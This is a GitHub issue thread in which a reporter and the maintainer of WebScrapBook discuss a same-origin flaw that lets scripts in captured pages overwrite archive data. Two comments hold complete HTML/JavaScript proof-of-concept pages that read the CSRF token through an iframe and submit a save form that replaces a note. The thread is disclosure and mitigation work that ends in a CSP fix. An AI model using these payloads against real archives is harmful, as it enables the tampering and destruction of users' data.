-
Notifications
You must be signed in to change notification settings - Fork 19
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Extension and browser must use distinct "Origin" #16
Comments
I agree that using same origin for backend API and serving captured pages can open a security hole as you described, although it may not be too common as it requires an intentional XSS-ing site and the user to capture such web page without purging scripts, which is the default WSB capture setting. However, serving multiple ports/hosts for the backend would significantly increase the difficulty for the user to set up, and it also requires a large code reworking. Furthermore, PyWebScrapBook also provides a web interface itself, which can be accessed by visiting a served directory like Before we've come up with a full solution, for now I think we can take advantage of the connect-src content security policy, which restricts the browser to connect via scripts. We can add a
|
I do not think it is really hard for users to add another optional (but highly recommended) section to config with another host and port. By default view and manage interfaces could share the same origin. There is no problem to start another thread with addition WSGI server in the code. During extension setup it is better to allow user to specify any address and to fetch the counterpart using a dedicated API method. Administrative part of web interface may share origin with address for API requests from the extension but it should not be the same as origin to view saved pages. In the backend code series of |
What do you think about the CSP approach mentioned above? A quick test shows it does can help block AJAX requests from captured pages. If there's no significant flaw we may implement it for now. As for full redesign for separated view/administration, it is nothing a small work and may pend until we've got time. |
Sorry for the delay. I realized that I have no solid picture how to use Your Idea with Actually restrictive After reading "Cross-Site Request Forgery Prevention Cheat Sheet" Let's obtain a token using iframe and perform an action by submitting a form. <!DOCTYPE html>
<html data-scrapbook-type="note">
<head>
<meta charset="UTF-8">
<meta http-equiv="Content-Security-Policy" content="connect-src 'none';">
<title data-scrapbook-elem="title">WSB frame hack</title>
</head>
<body>
<h1>WebScrapBook iframe hack</h1>
<iframe src="/?a=token&f=json"></iframe>
<div>
<form id="form" action='/data/20200825072842466/index.md?a=save&f=json' method="POST">
<label>Token <input name="token" id="token"></label>
<label>Replacement text <input name="text" value="Hacked using form"></label>
<button type="submit" id="submitit">Hack it!</button>
</form>
</div>
<div>
<pre id="log"></pre>
</div>
<script type="text/javascript">
const hackTarget = '/data/20200825072842466/index.md';
var log = document.getElementById("log");
var tokenInput = document.getElementById("token");
var form = document.getElementById("form");
function logError(e) {
console.error(e);
log.innerText += "\nError:\n" + e + "\n";
}
async function hackIt() {
const token = JSON.parse(window.frames[0].document.body.innerText).data;
tokenInput.value = token;
form.submit();
}
setTimeout(() => hackIt().catch(logError), 1000);
</script>
</body>
</html> |
Good point. Can we prevent this by restricting token to be POST only? |
You are approaching to the limit of my creativity. Though I am not a pentester and do not have a ready to use cookbook or automatic tools. Single origin approach is fragile. Next time I could miss a way to overcome suggested protection. It will be even more harder to maintain achieved level of security during unavoidable modifications of code. Token could be obtained with POST method using a form inside iframe. Certainly scripts could be completely disabled on the captured pages and it will work in significant amount of pages. However it will break pages with self-contained JavaScript not requiring external resources. <!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="connect-src 'none';">
<meta charset="UTF-8">
<title>WebScrapBook double form hack</title>
</head>
<body>
<h1>WebScrapBook double form hack</h1>
<div>
<iframe src="index.html"></iframe>
</div>
<div>
<form id="tokenForm" action="/?a=token&f=json" method="POST">
Form to fetch token
</form>
</div>
<div>
<form id="overwriteForm" action='/data/20200825072842466/index.md?a=save&f=json' method="POST">
<label>Token <input name="token" id="token"></label>
<label>Replacement text <input name="text" value="Hacked using double form"></label>
<button type="submit" id="submitit">Hack it!</button>
</form>
</div>
<script type="text/javascript">
const hackTarget = '/data/20200825072842466/index.md';
var log = document.getElementById("log");
var tokenInput = document.getElementById("token");
var overwriteForm = document.getElementById("overwriteForm");
var tokenForm = document.getElementById("tokenForm");
function logError(e) {
console.error(e);
log.innerText += "\nError:\n" + e + "\n";
}
async function hackIt() {
const token = JSON.parse(window.frames[0].document.body.innerText).data;
tokenInput.value = token;
overwriteForm.submit();
}
if (window.parent == window) {
setTimeout(() => hackIt().catch(logError), 1000);
} else {
tokenForm.submit();
}
</script>
</body>
</html> |
There is |
Obviously I was wrong with
since |
If the user can't guard himself from capturing a page with malicious scripts, there's not too much thing we can do. Even if viewing and administrating are origin separated, a malicious script in the database can still do many bad things, such as mining, generating phising or CSRF links, auto-downloading malwares, or scanning the whole scrapbook and stealing everything to a remote server. In this aspect, CSP may provide more protect ion than separating origin by disallowing connection. I think form action is something that should be forbidden or at least limited, as the intension of a capturing page containing a form are more likely to get a static reference instead of a working form, which could lose the original context and be dangerous if accidentally submitted and the server of the source page doesn't guard against such CSRF-like behavior. Still another leak is that a malicious script can send offending requests via controlling a privileged page by framing it. We probably need to apply CSP for the whole scrapbook site and exempt the privileged scripts by inlining them and using the sha-* directive. This seems somehow ugly but is the only way I can think of currently. Another thing is to restrict framing so that a malicious script can't happily scan the whole site and send data to external by framing. This is doesn't seem easy as we don't want to block framing of normally captured web pages, which can contain frames from same or different origin. |
That is exactly the reason why I am asking for separated origins. I want to delegate CSP management to uMatrix that offers decent user interface for granular permissions or to NoScript that is more simple. If it is possible to serve different pages from distinct subdomains, it will be easy to set restrictive default policy and to enable scripts for particular pages. |
I don't think requiring an external browser extension is a solution. Additionally, if uMatrix can easily restrict scripts for particular pages, can't it do so when origin not separated? Further investigation shows that
This should be able to block all undesired requests from a potentially malicious script, with a side effect that AJAX and forms are not allowed for captured scripted pages. Can you check if there's still a possible leak? Additionally, we may add an |
Unfortunately it seems impossible to define path-specific CSP in uMatrix. (At least I could not figure out how to do it and there is gorhill/uMatrix#734) So convenient interface exist only for per-domain granularity. Even separating scapbook management interface and captured content makes protection more reliable. I consider subdomain per captured page as an extreme case. I do not think that relying to some extent to other extensions is bad. In my opinion it is better to concentrate on accuracy of capture and convenience of collection management, of course, having security in mind. I was disappointed that Firefox does not support As to forms, besides submitting of user data, I have seen an interface to a site archive implemented as a form to allow selection of interesting period. Sorry, I do not remember a link. I have not got an idea how to bypass |
Well, it's not so true to rely on a third party tool for basic security. We should implement basic security guard by default, possibly with options to turn then off if it would conflict with other tools with enhanced features.
CSP only blocks the request from a form action. If the interfaceis implemented with javascript that listens to a form submit event and do its handling, it will not be affected by CSP. OTOH, a
That's good. We will probably go for this, at least for now. |
Implemented CSP in 0.20.0 |
Sorry for the late response. I have checked that 3 my examples do not work with PyWebScrapBook-0.21.1 backend. Thank you for the CSP fix. If you do not mind, I would keep this issue open for a while, but I am not expecting particular actions from you currently. I hope, I will look into relevant parts of code more closely to get some impression concerning separation of API and view endpoints. |
I am considering the following as a quite serious security flaw. The least important consequence is self-destructing captures, but I am afraid of damaging of the whole archive.
My opinion is that extension (capture and edit) and browser (view content) context should be strictly separated. Ordinary browser windows should have credentials allowing only view of saved pages. Saving of new pages or editing of them should be available from extension code only.
Fully configured backend should use different domains for API and for saved content. In quick/developer setup mode it could be at least different ports of localhost. Personally I consider using dnsmasq and separate subdomain for each saved page.
Prerequisite: JS script is leaked somehow from origin page to the capture. It is hard to ensure that all scripts are cleaned even when the related option is set.
Let's assume that there is a note
/data/20200825072842466/index.md
on the server. In real life URL could be obtained from the directory index.I have put the following file to another directory simulating leak of JavaScript to the saved file:
I have clicked on this page in the WebScrapBook sidebar and got another page overwritten.
I believe that a separate WSGI application without support of modifying actions is required to serve saved pages for visiting them. In the case of "production" setup with reverse proxy application role shrinks to checking of authentication and rendering of markdown notes. Static files could be served by the reverse proxy directly. Different origin (host or port) is necessary to prevent CORS attacks.
The text was updated successfully, but these errors were encountered: